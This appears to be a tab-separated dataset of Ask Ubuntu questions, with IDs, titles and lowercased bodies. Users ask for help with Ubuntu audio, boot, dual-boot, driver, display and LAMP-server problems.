386991	how can i `` uncrackle '' my microphone input under pulseaudio ( alsa-only works )	when trying to talk on skype or record sound in audacity , the built-in microphone has a lot of crackling interferences , rendering input intelligible . when running audacity with pasuspender -- audacity , recording is fine . i ca n't do that with skype , though , as it still tries to use pulseaudio ( which is suspended , of course , but still visible to skype obviously ) , and produces no sound at all . so i would need a way to make pulseaudio accessing my microphone in the right way . i already tried running pulse_server 127.0.0.1 /usr/bin/skype to force skype to use alsa , but it freezes ...
386992	how can fix malformed line 56 in source list/etc/sources.list ( dist parse ) the list of sources could not be read	my name is pierre . i have just started using ubuntu . i have installed on my pc the 13.04 version . i wanted to update by using the command sudo apt-get update but i keep receiving an error message of type : e : malformed line 56 in source list /etc/apt/sources.list ( dist parse ) e : the list of source could not be read . please somebody help . thanks .
386994	how to get xgterm	i have installed scisoft version 7.5 . i need to run iraf in the scisoft from xgterm . but when i type xgterm in bash terminal it shows following message , no command 'xgterm ' found , did you mean : command 'xterm ' from package 'xterm ' ( main ) xgterm : command not found i guess xgterm is not on my system and i ca n't find it in ubuntu repository . how to get xgterm for ubuntu 12.04 ?
386995	empathy audio calls not possible with ubuntu 13.10 and lenovo thinkpad edge e130 with i3	i tried to use empathy for calls via xmpp and sip . audio and video calls are available options if i click on a contact , for example an xmpp contact . when i try to establish a call , the call window is opened , but the connecting sound starts to reloop , and within the audio properties for application window ( accessed from the little speaker in the tray of ubutu ) empathy keeps blinkin in and out in the rythm of the sound loop . is there any way to fix this ? audio calls worked flawlessly , when ubuntu was installed on a usb drive and connected to two different computers . now it is installed natively on the new laptop and empathy does not work as expected . i do suspect that it has something to do with the hardware/pulseaudio combination . the same behaviour happens on 12.10 and 13.04 installed on the thinkpad e130 if any more information is needed , i can provide . just let me know what . thanks in advance , ben
386997	icon themes seems not to be working on my ubuntu 13.10	when i go to the unity tweaker , and i choose an icons themes , all icons go blank , folders , etc , and only a few one seems to get changed . this happens with dl'ed themes but also with some themes that are already installed . actually , only hicolor , and 3 or 4 others work ... any idea ?
387001	ubuntu intallation issue using virtualbox	i am facing a same problem.when i install the ubuntu for the first time using virtual box system shows that to complete the installation you have to restart . i clicked restart button and waited long but it does n't work . please help me on this . my machine is win 8 sony vaio .
387003	change ubuntu 12.04 ( with gnome ) number of workspaces via command line	i 'm trying to change the number of workspaces on my ubuntu 12.04 with gnome from a terminal . it 's easily done by right clicking on the workspaces preview in the panel , but i would like to be able to do it from a shell script . my guess is to go through some gsettings org.gnome . command , but so far i 've been unable to find the proper schema and associated key to do that . would anyone have a tip ? thanks in advance for the answers !
387004	unity wallpaper with openbox wm ?	i 've installed openbox , tint2 and synapse to replace unity on my ubuntu 12.04 installation . when i log into my account openbox starts with a grey background , as expected . i just replaced compiz as wm , i still boot into the login screen from unity . sometimes , i do n't know when exactly , the unity background pops up . what 's the name of the wallpaper tool and how do i set up openbox to show the wallpaper at start ? ( and how do i change the wallpaper ? )
387005	holding down the super key does n't show unity keyboard shortcuts in 13.10	i just installed 13.10 on an old computer for my cousin . when i was trying to show her how to use ubuntu holding down the super key did n't bring up the keyboard shortcut cheat sheet for unity .
387006	installing without losing files	i 'm currently using the windows 7 and i want to replace the whole thing with ubuntu . how do i do that without losing my music and my movies ?
387009	apache could not access to copied folder : 403 access forbidden	i 'm new to ubuntu . i have installed lamp on ubuntu and everything is ok but while i copy a folder into /var/www it is not accessible via url . i have tried following commands : sudo cp -r desktop/site /var/www sudo chown myuser /var/www -r sudo chmod 755 /var/www -r also : sudo chown myuser /var/www/site -r sudo chmod 755 /var/www/site -r i event do n't see the folder while try list directories ( http : //localhost/ ) . however , it 's ok while i create a folder manually using sudoo mkdir command . what should i do and what 's the matter ?
387012	how to use `todo` with `getopt` utility ?	when i enter todo -l , the output must be as the following : 1 ) do my first task 2 ) do my second task . . . . . . i want know how to use -l option with todo using the getopt utility ?
387014	reinstall ubuntu 13.10 encrypted lvm	i installed ubuntu completely over my laptop . with an encrypted lvm volume , so for every reboot i type in my passphrase . now is my question : how can i reinstall ubuntu without deleting my home partition ? i just took the recommended way and think it just created one complete partition . are there tools to repartition it ? -- -edit -- - i found my own solution . after starting from disk/stick dont use install ubuntu now , but try out ubuntu . here you can click on the disk on the lower left and enter your password . now i can reinstall ubuntu without purging all files . only problem , after starting it shows me problem with bootmanager and i can skip this message , because it will still reboot and run , but before entering my password grub comes up . how could i fix this . and i would say it is a problem of the installer . -- -edit -- -
387022	missing cursor in ubuntu 1	i am using ubuntu 13.10 and i wanted to install nvidia drivers . i had few issues so i have chosen the way of x server settings . but again , some problems 'cause the conflict between niveau and nvidia drivers . so i decided to say niveau goodbye and unninstalled it ... since then it always popped error message that said that theres problem in my computer , but no problem nvidia drivers worked well . but now it after startup pops another message , long as 2 workspace screens which saiz something like `` ca n't use saved screen settings '' with this log : žádný z vybraných režimů nebyl kompatibilní s možnými režimy : zkouší se režimy crtc 633 crtc 633 : zkouší se režim 1600×900 @ 60hz s výstupem na 1360×768 @ 60hz ( průchod 0 ) . . . crtc 634 : zkouší se režim 640×480 @ 60hz s výstupem na 1360×768 @ 60hz ( průchod 1 ) i have ubuntu ported to czech language , but it means that it tries mode 1600x900 @ hz with output 1360x768 @ 60hz . and that repeats until 640x480 @ 60hz this error message is still fine , if i let it be it makes no problem i can still see my cursor , but after i close it , my screen refreshes and cursor dissappears ... any ideas or mercyfull souls ? zututukulipa
387027	turn off display after n seconds in shell script	# ! /bin/sh ( time= $ ( zenity -- scale -- min-value=0 -- max-value=20 -- text= '' pls select time in ( s ) '' ) ) & & sleep $ time & & xset dpms force off i wanted to turn off display after n seconds , but this does not quite work ... expert 's advise please ...
387029	how can i skip bad sector on my hard drive ?	i have one external hard drive which i plug to my linux machine . it causes read and write operation problems . when i check it with fdisk -l it wait for information to display for while . after few minute it got display . i had use badblocks command for checking bad sector on disk . after around 1:30 min it gives total 1040+ bad sector location . so is there any way to skip this location and use remaining memory ? ? ? or fixing this problem . whether i need to change it .
387032	a4tech webcam problem in ubuntu	i have brought a webcap a4tech model no : pk-760e . i have a cd with it , but the driver is not workng for ubuntu but for windows . how can i install the driver in ubuntu so that i can make a video chat in skype .
387034	how to install nagvis on ubuntu	hi friends please help me for install nagvis on ubuntu i wnat to describe all things step by step and help me about the notification via email at localhost does not come me
387035	ubuntu having a weird problem whille detecting for /	this is happening rapidly and since 3 days . it has happened 3 times . when the boot splash screen appears , while booting , i see an error saying that problems were detected while checking for / and after that it asks me to repair by pressing a key and after that it says that problems were found while checking for /tmp and after that it again reboots and works normally please tell me that what is happening ?
387038	chrome tabs open empty when calling them from any application	i have a strange problem since i reinstalled google chrome yesterday after briefly trying out chrome beta . when i clicking a link in any application except for clicking it inside chrome itself i only get a new browser window . seems there is something awry with chrome being the default handler for the http protocol or some such . when opening a link in thunderbird ( which i started from the console once to check for error messages ) or running 'google-chrome ' from a console while chrome is running i get the message created new window in existing browser session . the opened window is always empty ( showing the normal new tab stuff ) so link clicking does not work at all . this becomes even worse when clicking any help item in an application that relies on the browser because in that case i do n't even have a chance to copy the link and open it manually . any idea how to fix that ? when using firefox as default browser it works ok .
387040	why i 'm getting the installation menu again after installing ?	after i choose to reboot the computer when ubuntu 13.10 done installing , i booted again with the `` try ubuntu '' or `` install now '' i chose install now ( note that i installed ubuntu already ) and it had 3 options : reinstall windows and install ubuntu or something like that reinstall ubuntu and format everything and install ubuntu again i chose back , and i chose the `` try ubuntu '' is this normal ? all my system is functioning ok right ? i have every feature like a normal ubuntu user cause i installed it right ? ?
387044	how to edit the disk partition ?	when i installed ubuntu i had already windows 7 in my computer and i installed ubuntu aside windows 7 , but when i did the disk partition i did it the opposite of what i wanted ( i mean i give ubuntu 500g and windows 7 200g but what i wanted actully is the opposite ) is there any way to edit disk partition ?
387047	not getting os selection menu after boot-repair	i had ubuntu 12.04 pre-installed on my laptop with /home partition of about 246gb ( and all other partitions like / and /boot etc . with variable sizes ) . i shrinked the drive and made a new one of 100gb from /home and installed windows 8 there . after that grub menu was not being shown as obvious . then i booted live cd ( same ubuntu 12.04 ) and did `` recommended repair '' by boot-repair . it said everything went fine but when i start the system , grub does not show the option to select windows os . only those , with linux-generic and recovery kind of options , but not windows loader . here is the log file from boot-repair .
387048	could not apply the stored configuration for monitors	i 'm using ubuntu 13.10 with 2 monitors . i woke up , started my computer , and bum ! i ca n't start system with cause `` could not apply the stored configuration for monitors '' and i ca n't do anything ... what shell i do ? i 'm now on windows , on my mothers ' computer ...
387051	can not run script file	i am new at ubuntu i installed comodo antivirus and then to make it probaly working you have to run an script file , and i tried run a file an post_setup.sh from the teriminal by typing : gksu gedit post_setup.sh making it executable does nothing as well , and the apps is called comodo antivirus , and have a missing cmdavd.sh file can not find it by searcing the entire drev is this a bug , and it is installed probaly but is missing , and it is also installed from the softwarecenter . can someone please help .
387052	how to install ubuntu to a .disk file	i am using ubuntu 12.04.3 live usb i have created a 25gb .disk file that is located on the windows partition . ( same as wubi ) i have done : sudo losetup /dev/loop1 /mnt/ < disk file location > /root.disk . i can now see that .disk file using disk utility and it has a ext4 filesystem . how can i add this disk ( and a swap .disk file ) to the ubuntu installer so i can install ubuntu into the .disk files .
387059	dvd 's have stopped working on 13.10	i dont know why but vlc , media player , smplayer simply wont detect and play any dvd . please tell me what i need to show you to help me ... im not completely usless with commands etc but a dvd problem has never occured to me before . this is what vlc says : playback failure : dvdread could not open the disc `` /dev/dvd '' . your input ca n't be opened : vlc is unable to open the mrl 'dvd : ///dev/dvd ' . check the log for details . also i have just realized that it wont let me copy files from a disc to hardrive . now im worried compaq cq58 very new model used to have windows 8
387062	how to solve the phpmyadmin not found issue after upgrading php and apache ?	recently i have install the php , apache , mysql , phpmyadmin , python in my ubuntu desktop 12.04.3 lts to use it as a lamp server . the commands i used to install these are given below : 1 : sudo passwd 2 : su 3 : apt-get install php5 4 : apt-get install apache2 5 : apt-get install mysql-server mysql-client 6 : apt-get install phpmyadmin 7 : apt-get install python 8 : apt-get install python-mysqldb 9 : ln -s /etc/phpmyadmin/apache.conf /etc/apache2/conf.d/phpmyadmin.conf 10 : /etc/init.d/apache2 restart then everything works fine . the lamp server runs great . then i thought to upgrade the whole lamp server i mean the php , apahce , mysql , phpmyadmin etc . then i searched in google and get some ppa which got the latest versions of these softwares . then i added those ppa . the ppa links : 1. https : //launchpad.net/~tuxpoldo/+archive/phpmyadmin 2. https : //launchpad.net/~ondrej/+archive/mysql-5.6 3. https : //launchpad.net/~ondrej/+archive/apache2 4. https : //launchpad.net/~ondrej/+archive/php5 then is used these ppa and firstly upgraded the phpmyadmin then mysql server then apache and then php . after upgradation of phpmyadmin and mysql server the whole lamp server runs well with the updated mysql server and phpmyadmin . but after the upgradation of apache and php the phpmyadmin is not showing up . when i try : http : //127.0.0.1/phpmyadmin it says `` not found '' . how can i sove this problem with the phpmyadmin ? ? please help me as fast as you can . i am in great trouble for this . thanks in advance .
387064	problem installing ubuntu 12.04.3 with flash drive on a windows 7 laptop	i tried installing ubuntu 12.04.3 from a flash drive to dual-boot with my current win7 operating system ; after putting the .iso on it with linux pen drive it booted on the flash very well , but when it got to the part of the installation where you choose how you want to install it , i picked `` install alongside windows 7 '' . after i clicked `` continue '' , it restarted my computer , there was a few command lines that came up , then the installer restarted from the beginning . i tried to install over 20 times , but to no avail . please help ! i really like both ubuntu & win7 , and would really appreciate some help .
387067	ethernet is not working	i have installed ubuntu 13.10 on a old pc . its connected to my imac with an ethernet cable . i followed this : http : //outerware.blogspot.nl/2011/01/finally-internet-between-mac-and-ubuntu.html according to ubuntu networking is set up correctly , it shows the connection sign . but i ca n't get any internet connection . no ping , no browsing i have used ubuntu before ( 12.04 ) and had internet this way . but now it isnt working who can help me ? ?
387069	need asn viewer gui software for ubuntu	i have a file having asn data which is ber encoded . and i want to decode the same . is there any tool in linux/unix which can achieve this ?
387071	adding the ppa does not update geary	i have installed geary mail client 0.4.0 from software center . after i read there is a new version , 0.4.1 , i added the ppa through terminal . sudo add-apt-repository ppa : yorba/ppa sudo apt-get update still , i am stuck with 0.4.0 . have i done something wrong ?
387078	how to make php files by which mysql , php , phpmyadmin , apache , python etc . details will show ?	how can i make a php files which will show the details of php , apahce , mysql , phpmyadmin , python and ubuntu system usage and information .
387080	hp pavilion not booting from usb	i have deleted windows vista and i 'm trying to boot from usb , but it does n't work . i tried changing the bios , no success . i 've made the bootable usb with unetbootin on mac , on a 2 gb usb formatted as fat32 .
387083	how do i share a wired dsl connection as a hotspot ?	i have a wired dsl connection in my laptop , and i want to share this creating a hotspot . ubuntu 12.04 dell inspiron 1545
387085	how can i delay start-up based on time of day ?	i have a bad habit of spending too much time on my computer at night when i should be sleeping . in the past , shutting down my computer was an effective way to enforce a no-technology bedtime on myself . however , i just upgraded to an ultrabook which takes only a few seconds to boot and i no longer have the disincentive to avoid restarting my computer . i would like to have a python script or something that programmatically delays log-in for a set period of time depending on the time of day . for example , no delay if starting the computer during normal working hours , but if i try to start the system up at 10:00pm , i would like it to count down for five minutes or so before allowing me to log-in . what would be the best way to accomplish this ? i am running ubuntu 13.10 if this makes a difference .
387088	keep dual monitor position settings	i can change the position of my dual monitors using arandr . however , i have to do this every time i log back in . i 'd like to keep the configuration settings without having to do this every time . i did n't have a .config/monitors.xml initially . i tried adding it with the correct settings , but it still does n't work . i 've also tried looking at other answers like this one , but i do n't have any of the files he 's referring to including /etc/lightdm/lightdm.conf which seems to be the functional one . is there anything i can do to keep these settings or have my machine respect .config/monitors.xml ? i 've also tried updating .profile to include the xrandr calls , but these will only run when i open the terminal -- not that i could get them to work properly anyway . i 've also tried changing this via nvidia-settings and clicking `` save to x configuration settings , '' but the settings still do not persist after relog/reboot .
387089	hybrid video adapter ( intel / ati ) does not work together and generates a disturbing heating	how do i with my ultrabook hybrid video adapter to work on ubuntu ? ( video adapter intel / ati ) i tried several solutions found in forums but nothing worked .
387090	how to allow all people to access mysql database ?	how can i set to allow all the people to access mysql databases ? ? i mean like how to set wildcard so that anyone can access mysql databases .
387092	where to store android sdk files	after reading this answer i was wondering where should i put my extracted android sdk files ( step 4 ) ?
387094	hp pavilion g7 -2275dx - windows 8.1	i want to install ubuntu 12.04.03 onto my hp laptop along side windows ( dual boot ) under the `` god mode '' for windows 8 , i have a partition utility - 500gb free on the system drive , what is recommended for ubuntu ? also , driver compatibility - amd a8 - apu 1.9ghz quad core , radeon 7640g video , amd high def audio , with idt high def codec . qualcomm atheros wifi realtek pcie fe family controller are there any know issues with any drivers or dual os with win 8.1 ?
387095	ubuntu 13.10 font problem on 30 '' dell u3014 at 2560x1600	i have 13.10 , with a nvidea 8600gts , driver 304.88 , xserver 1.14.3 , working fine with 2x 24 '' 1920x1200 screens in twinview . i have swapped one out for a dell u3014 but whilst getting the reported 2560x1600 resolution , i find the font is crumpled , blurry and unreadbale , switching res to 1920x1200 ( which worked on the 24 '' ) results in the same . what can i do to make the fonts readable ?
387097	ubuntu with win7	i have ubuntu 13.04 installed on my computer . ubuntu on 130gb partition . ubuntu swap on 10gb separate partition . in addition 300gb partition for data . now i want to : resize the data partition from 300gb to 250gb . live the ubunt os but resize the ubuntu partition from 130gb to 50gb . install win7 64 bit on a new partition 130gb ( 50gb from data + 80gb from ubuntu ) . enable dual boot - ubuntu and win7 . thank you for help , david .
387099	multi os windows along with ubuntu	i have just heard about ubuntu..i am totally new to it ... but i am impressed by the os features..but i have windows 7 installed in my toshiba laptop ... i have some questions to be answer before installing ubuntu in my laptop.. can i use windows 7 along with ubuntu ? will my original windows os will be deactivated post the installation ? what are the benefits or better features seen in ubuntu as compared to those in windows also i have bada os ( samsung wave 3 ) in my phone , will i will able to install ubuntu on it ?
387101	how to install nginx in ubuntu ?	recently i have installed a lamp server in my ubuntu desktop 12.04 lts . now how can i install nginx and implement with my present lamp server ?
387106	laptop with ubuntu and external monitor	i 'm trying to connect my external monitor to the laptop im using . but i get this error : i ran all the updates and recommended driver settings . any ideas how to fix that ?
387110	ubuntu will not boot on new asus m51ac	i installed the from the live cd , and the installation worked . ( i choose the 64 bit installation ) but when i restart my computer it just goes into the bios system . when i select to boot from the drive it just puts me back in the bios . i can boot from the live cd i used boot-repair and it did n't work and gave me this message to paste : http : //paste.ubuntu.com/6530190/ please help thanks
387112	login goes back to login screen	ubuntu dont let me login in a graphic session . i type the password ( it detects if it 's wrong ) and even typing it wright the system take me again to login screen . i 've found this other question and run the pastebin command , getting this url : http : //paste.ubuntu.com/6530253 i 've also checked my home permissions , it 's rwx for the owner ( me : d ) thank ! edit : when i login in tty1 , bash returns an error mensage in the file /etc/profile . ubuntu had an old copy of this file , so when i use the old copy , it works just fine . only problem , the upper and left bars ( with programs , open things , etc . ) didnt show up . i 'll try get these back later
387113	lost all my data on the harddisk	i have windows 8 before installing ubuntu 13.04 on my lenovo z580 laptop . while installing ubuntu i have chosen to erase the disk without knowing . i cant find any files of my hard disk . plese help me . thank u very much if it is helpful .
387115	is it possible to install a newer version of cloud-init on lucid ?	i 'm using ec2 user-data to configure certain services before they are launched on newly spun up instances . i 've been using # cloud-boothook as the beginning of user data , and it worked like a charm on precise and newer releases . however , latest cloud-init package on lucid ( 0.5.10 ) does n't support it . using # ! /bin/bash at the beginning does n't work as it 's executed too late in the boot process ( after the services are started ) . is there a way to install cloud-init from scratch , or via some backport package ? or basically any other way to utilize user-data in this way ? any help is more than appreciated .
387119	not showing dual boot option & installation drive of ubuntu 12.04 on preloaded windows 7	i 'm very new to this , need urgent help . i wanted to try ubuntu 12.04 along windows 7 as dual boot . after clicking reboot option at end of ubuntu installation , dual boot window does n't appear & is loading windows 7 straight . funnier windows is not showing drive in which i installed ubuntu . i have made a separate 30 gb partition for ubuntu ( for not to take any chance ) . i installed ubuntu in that ( as ext4 ) & clicked ok. then i changed option which appears below this ( which i cant remember quite well ; but some loader option - to load on entire hard drive ( toshiba hdd 500gb ) to load on the drive which i installed ( ext 4 ) ) . installation was smooth but i didnt got any dual boot option & drive folder is hidden . how to correct these problems ?
387121	nautilus is not showing the full or folder file names	when my folder location is too long , i ca n't view the full file or folder names . double clicking on the name field or in between name and size does n't work either .
387133	i installed linux and replace with window 7 ? how to recover drives data back	i just installed linux in my laptop.i had window 7 , i replace ubuntu with window 7. the drives data ( d : , e : ) in window is not showing in linux . how to recover my drives data . i did n't use linux yet . how to get my data back.in this ( linux ) it shows 490 gb free . my hard disk is 500 gb.how to get back my 150 gb data now . please describe me the way to get all the deleted data.please help me.i need your suggestion.thanks a lot for helping me .
387134	how to install and use nimbuzz with cntlm proxy setting in ubuntu 12.04lts ?	how to install and use nimbuzz ( or gajim for connecting to nimbuzz ) with cntlm proxy setting in ubuntu 12.04lts ?
387137	broadcom 43142 not working on 3.8.0-32	i was running my dell vostro 3560 on ubuntu 12.04 lts on kernel 3.8.0-29. when i installed ubuntu , my wireless ( broadcom 43142 ) was not working . so after searching on ask ! ubuntu , i somehow managed to start it and it worked brilliantly . but when i updated it , it got the kernel 3.8.0-32 and my wireless again turned off . i attempted to restart it again using that old method and even tried some new , which were given on this forum , but in vain . my system is still without wi-fi : ( any tweak to solve this irritating problem ?
387140	file not recognised error when making library	firstly i hope this is the correct stackexchange for this question . if not i 'm happy to take it elsewhere . i 'm trying to build a library called cbflib . i enter the following commands into the terminal cmake ../cbflib-0.9.3.1 make all it gets to 21 % and then gives the following messages linking c executable bin/adscimg2cbf lib/libhdf5_hl.la : file not recognized : file format not recognized collect2 : ld returned 1 exit status make [ 2 ] : *** [ bin/adscimg2cbf ] error 1 make [ 1 ] : *** [ cmakefiles/adscimg2cbf.dir/all ] error 2 make : *** [ all ] error 2 this file ( that is not recognised ) i believe is from the hdf5 library which i installed using apt-get a few days ago so in theory it should be up to date and installed correctly . does anyone have any ideas about fixing my problem ? please let me know if you need more info .
387142	how to get canoscan lide 25 to work with simple scan in ubuntu 13.10 ?	after upgrading to 13.10 my scanner stopped working . simple scan can kind of detect my scanner , but fails to scan . it keeps trying , instead of just telling that `` no scanner has been found '' . i also tried xsane , which told me `` no scanner could be detected '' my scanner always worked fine on older ubuntu releases and still does on a laptop that runs 13.04 simple scan and xsane work when run as root . seems like a permissions problem . when the scanner is plugged-in simple scan freezes when i try to shut it down . even if run as root .
387143	install 13.10 on ssd fails	got some new parts today and decided to rebuild my main computer . among the parts were a crucial 240gb ssd . i boot from the live-dvd and partition 200gb of the ssd as `` / '' , and put `` /home '' on my trusty old 1tb sata hdd . install seems to go fine , minus some hiccup where the reboot does n't happen automatically , but i am immediately dumped to a grub rescue prompt with the message `` error : no such partition '' when i attempt to boot . any help or pointers welcome . the reboot-hiccup happens when dvd is ejected , i get about a million of these : [ various-numbers.various-numbers ] hub3-4.1:1.0 : connect-debounce failed , port 2 disabled and am finally forced to press reset .
387145	installing programs/saving files on persitence or not	i wanted to install office 2010 and save files that i use daily but as i am a rookie to ubuntu and linux in general , i do n't know if it makes a difference where i save it . thanks for your help .
387146	run an application from a separate installation of ubuntu	is it possible to run using lxc application from already installed distribution on another partition ? specifically it would be steam on wine .
387147	ubuntu touch installation on trekstor xiron 10.1 tablet ?	i 'm wondering if someone already tried to use this little ( in price ) device for installing ubuntu touch on it ? specification can be found on e.g . amazon . appreciate any feedback ! thanks & have a great day ! stefan
387148	allowing computers in network view sites in my web server	i 'm running a lamp on my ubuntu 13.10 machine and i have some site running on it ( personal projects ) . now i want the guys in our network to be able to type my ip/site and view what ive been working on . i have set up virtual hosts on my server to run this site . at the moment if i connect my cell to the network and type my ip i see the default apache `` it works '' but if i do ip/site i get a not found . i not much of a system guy so i would appreciate any help .
387151	network-tools 3.2.0 idel 's at the middle	network-tools 3.2.0 idel 's at the middle during traceroute . ( gnome-nettool 3.2.0-0ubuntu1 ) it idel 's way too far on google.com . while trace-route command at terminal ends up with different results . any idea what may be the difference between the two in implementation , port being utilized or source code used ? alan @ ubuntu : ~ $ traceroute msn.com traceroute to msn.com ( 65.55.206.228 ) , 30 hops max , 60 byte packets 1 * * * 2 * * * 3 * * * 4 * * * 5 * 197.199.255.154 ( 197.199.255.154 ) 116.995 ms 117.523 ms 6 * * * 7 * pos10-1.palermo9.pal.seabone.net ( 213.144.181.21 ) 246.700 ms 229.943 ms 8 * te1-1.milano52.mil.seabone.net ( 195.22.196.135 ) 529.913 ms * 9 * * * 10 xe-0-1-0-0.fra-96cbe-1b.ntwk.msn.net ( 207.46.45.241 ) 232.248 ms 159.732 ms 159.876 ms 11 * xe-2-0-1-0.fra-96cbe-1a.ntwk.msn.net ( 207.46.42.94 ) 160.086 ms 159.926 ms 12 xe-1-1-1-0.ash-96cbe-1a.ntwk.msn.net ( 207.46.43.24 ) 239.803 ms 239.432 ms 239.366 ms 13 xe-9-3-1-0.blu-96c-1a.ntwk.msn.net ( 207.46.37.37 ) 239.779 ms * * 14 ten8-2.blu-76c-1b.ntwk.msn.net ( 207.46.47.153 ) 239.886 ms ten6-4.blu-76c-1a.ntwk.msn.net ( 207.46.46.121 ) 240.345 ms 229.091 ms 15 ten9-2.blu-76c-1a.ntwk.msn.net ( 207.46.47.155 ) 259.645 ms * 208.978 ms 16 * * * 17 * * * 18 * * * 19 * * * 20 * * * 21 * * * 22 * * * 23 * * * 24 * * * 25 * * * 26 * * * 27 * * * 28 * * * 29 * * * 30 * * * alan @ ubuntu : ~ $ traceroute google.com traceroute to google.com ( 173.194.39.37 ) , 30 hops max , 60 byte packets 1 * * * 2 * * * 3 * * * 4 * * * 5 197.199.255.154 ( 197.199.255.154 ) 143.863 ms * * 6 * * * 7 pos10-1.palermo9.pal.seabone.net ( 213.144.181.21 ) 213.283 ms 213.991 ms 149.529 ms 8 te2-10-0-13.milano26.mil.seabone.net ( 213.144.181.5 ) 171.137 ms 169.506 ms 170.292 ms 9 72.14.196.141 ( 72.14.196.141 ) 189.003 ms 190.309 ms 191.769 ms 10 216.239.47.128 ( 216.239.47.128 ) 159.820 ms 160.761 ms 159.450 ms 11 209.85.253.9 ( 209.85.253.9 ) 160.065 ms 158.529 ms 189.906 ms 12 209.85.243.109 ( 209.85.243.109 ) 170.168 ms 169.412 ms 176.903 ms 13 mrs02s04-in-f5.1e100.net ( 173.194.39.37 ) 159.879 ms 188.606 ms 159.919 ms alan @ ubuntu : ~ $
387155	deepin game center on saucy ?	is there a way to install game center from latest deepin release onto ubuntu 13.10 ?
387160	what is ubuntu 12.04 lts php 5.3.10-1ubuntu3.6 equivalent to official php ?	i m in a middle of weird situation where date ( 'y-m-d ' , '0000:00:00 ' ) returns '1969-12-31 ' on localhost running ampps , php 5.3.21 date ( 'y-m-d ' , '0000:00:00 ' ) returns '-0001-12-31 ' on staging server running ubuntu 12.04 lts php 5.3.10-1ubuntu3.6 . i check strtotime function in php and found this comment here . it says php 5.3.3 returns : -0001 php 5.2.10 returns : 1970 so how come my php 5.3.10 acts as if it is php 5.3.3+ ? my guess is dev branch off original php 5.3.10 then work on it and package it in ubuntu 12.04 lts , is it correct ?
387166	ubuntu 13.10 bumblebee wont switch to nvidia	i installed ubuntu 13.10 and followed the instructions on how to install bumblebee . i then did a test with glxears and the optirun glxears but i get the same frame rate . my guess is optirun wont switch to nvidia , previously if i ran optirun cairo-dock i would get the dock with full effects now i do n't get it it worked fine in ubuntu 12.04 also when running nvidia-settings i get the following error : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run `nvidia-xconfig` as root ) , and restart the x server is there also a way to tell what nvidia drivers i have installed ? and how do i get optirun to switch from on-board to nvidia ? i have a pc with : nvidia 640m le ubuntu 13.10 64bits i7
387171	xsession error - libvdpau_nvidia.so . but no nvidia card	the .xsession-errors file in my home directory has this error many times : failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory but i do not have a nvidia card ( i have only an ati/radeon card . ) i looked around and i have only 1 package installed with nvidia in the name : nvidia-common i tried to remove the package but it is tied to the desktop.. : ( the following packages have unmet dependencies : ubuntustudio-desktop : depends : nvidia-common but it is not going to be installed . the following actions will resolve these dependencies : remove the following packages : 1 ) ubuntustudio-desktop leave the following dependencies unresolved : 2 ) jockey-common recommends nvidia-common ( > = 1:0.2.36 ) history/background : yesterday , i wiped my disk and re-installed ubuntu studio from scratch . so , i was looking through the errors to get some sort of a baseline . ( maybe i should n't do that.. ) what can i do to remove the error ? or should i just ignore it . thanks in advance . jay e. ps many thanks to all the people that put the fglrx package together so i can crunch data with catalyst for boinc ! !
387178	unable to boot ubuntu after power failure	the battery in my laptop became dislodged , and when i turned my laptop back on and tried to boot ubuntu i was faced with this : mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have /sbin/init . no init found . try passing init=bootarg . busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) after reading in other forums that a potential fix was to boot slax os from a live usb , and from the terminal run : e2fsck -y -f -v /dev/sda1 after about 3 and a half hours the process was complete , so i restarted my laptop and tried to boot ubuntu once again . i was now faced with a slightly different message : mounting proc on /root/proc failed i restarted my laptop and selected recovery mode from the grub menu . booting into recovery eventually failed and this message was displayed : mounting proc on /root/proc failed friendly-recovery pre-start process ( 186 ) terminated with status 127 friendly-recovery post-start process ( 187 ) terminated with status 127 . i am now at a loss as to how to proceed . i can view the contents of the internal hdd through slax if that makes a difference . i 'm a bit of a linux-noob so be gentle ! thanks update : a list of commands run from the grub console and their outputs command : ls output : ( hd0 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) command : ls ( hd0 ) output : device hd0 : no known filesystem detected - total size 1953525168 sectors command : ls ( hd0,1 ) output : partition hd0,1 : filesystem type ext* - partition start at 2048 - total size 1920980992 sectors ( i have a feeling that this is the ubuntu partition ) command : ls ( hd0,2 ) output : partition hd0,2 : no known filesystem detected - partition start at 1920983040 - total size 32540672 sectors command : ls ( hd0,3 ) output : error : no such partition
387180	the line 56 in the file /etc/apt/ sources.list is not correct ( uri parse )	kubuntu does n't let me upgrade . the error message says : the line 56 in the file /etc/apt/sources.list is not correct ( uri parse )
387188	ubuntu 12.04 skype messages do n't deliver	i 've downloaded skype from the official website , and opened it with ubuntu-software-center , but later i tried to send messages but it does n't deliver any suggestions !
387193	what checks should be used when installling non-repository or offline software ?	case 1 ) let 's say some software is n't available in the repositories and you have to download it from a website and install it . case 2 ) you have downloaded a drm free paid software but can no longer download the latest version ( like humble bundle without steam keys ) and it has been sitting there forever and you find the need to use it again , but are not sure if it has been infected and you ca n't take a chance . case 3 ) you backed up your software to a usb storage and are not sure if it has been modified or infected but want to install it . case 4 ) you get software from a friend . you want to install it . what can be done in the above cases to reduce the risk of malware ? also please do n't point that the chances of getting malware on linux are less .
387194	is it possible to buy a physical copy of ubuntu ?	do n't want to waste money on buying windows 7 , so the laptop is going to be ordered without an os . is it possible to buy a physical copy ( cd ) of ubuntu ?
387200	wireless not working.toshiba p50-a-12z- . artheoos . ubuntu 12.04 ( lts )	i installed ubuntu 12.04 over a toshiba p50-a-12z and after reformattting the disk with windows8 ( i always kept windows before on a smaller partition but this time , windows8 was to bad even for me to keep so there it goes ) . after doing a recommended upgrade of ubuntu i solved some issues but i still am having problems with the wireless ( i get a good wired connection though ) . wireless used to work well with windows8 before removing it from my system . i had to play with the bios to install ubuntu from disk ( disable the uefi ) but i doubt this should have any effect on the wireless performance . i tried many things i saw in this and other forums but nothing seems to work . i suspect the issue is on the driver that may not be available as on intel 's website say this device was released on the second half of 2013 and maybe too new for unsoported os ? . i checked on intel 's webpage and even though they say the offer support for linux could not find the driver for what i think is my wireless device . still , i hope a smart shoul from this forum could offer some help . any help would be much appreciated . first , some useful info . rfkill only shows bluetooth . pressing f12 turns bluetooth on and off but no sign of wireless rfkill list 5 : hci0 : bluetooth soft blocked : no hard blocked : no lshw -c network shows the device is unclaimed . 